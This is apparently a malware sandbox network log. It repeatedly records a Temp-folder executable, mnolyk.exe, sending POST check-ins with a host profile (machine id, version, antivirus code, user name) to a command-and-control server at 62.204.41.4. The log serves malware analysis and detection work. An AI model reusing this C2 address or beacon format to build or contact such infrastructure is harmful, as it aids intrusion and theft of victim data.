                                                        Feb 6, 2023 14:17:11.967792034 CET | 303 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        102 | 192.168.2.5 | 49792 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:12.357233047 CET | 303 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:12.424122095 CET | 304 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        103 | 192.168.2.5 | 49793 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:12.843597889 CET | 304 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:12.909478903 CET | 305 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        104 | 192.168.2.5 | 49794 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:14.531024933 CET | 305 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:14.596820116 CET | 306 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        105 | 192.168.2.5 | 49795 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:14.968803883 CET | 306 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:15.033853054 CET | 307 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        106 | 192.168.2.5 | 49796 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:16.378789902 CET | 307 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:16.448314905 CET | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        107 | 192.168.2.5 | 49797 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:16.911714077 CET | 308 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:16.977150917 CET | 309 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        108 | 192.168.2.5 | 49798 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:17.167239904 CET | 309 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:17.233485937 CET | 310 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        109 | 192.168.2.5 | 49799 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:17.417285919 CET | 310 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:17.481492043 CET | 311 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        11 | 192.168.2.5 | 49701 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:31.297622919 CET | 211 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:31.362792015 CET | 212 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        110 | 192.168.2.5 | 49800 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:17.654881954 CET | 311 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:17.718599081 CET | 312 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        111 | 192.168.2.5 | 49801 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:17.902349949 CET | 312 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:17.965825081 CET | 313 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        112 | 192.168.2.5 | 49802 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:18.144256115 CET | 313 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:18.215267897 CET | 314 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        113 | 192.168.2.5 | 49803 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:18.396344900 CET | 314 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:18.459352970 CET | 315 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        114 | 192.168.2.5 | 49804 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:18.644414902 CET | 315 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:18.708070993 CET | 316 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        115 | 192.168.2.5 | 49805 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:18.884453058 CET | 316 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:18.946724892 CET | 317 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        116 | 192.168.2.5 | 49806 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:19.119476080 CET | 317 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:19.188005924 CET | 318 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        117 | 192.168.2.5 | 49807 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:19.395600080 CET | 318 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:19.461359978 CET | 319 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        118 | 192.168.2.5 | 49808 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:19.636620998 CET | 319 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:19.700081110 CET | 320 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        119 | 192.168.2.5 | 49809 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:19.879292965 CET | 320 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:19.942990065 CET | 321 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


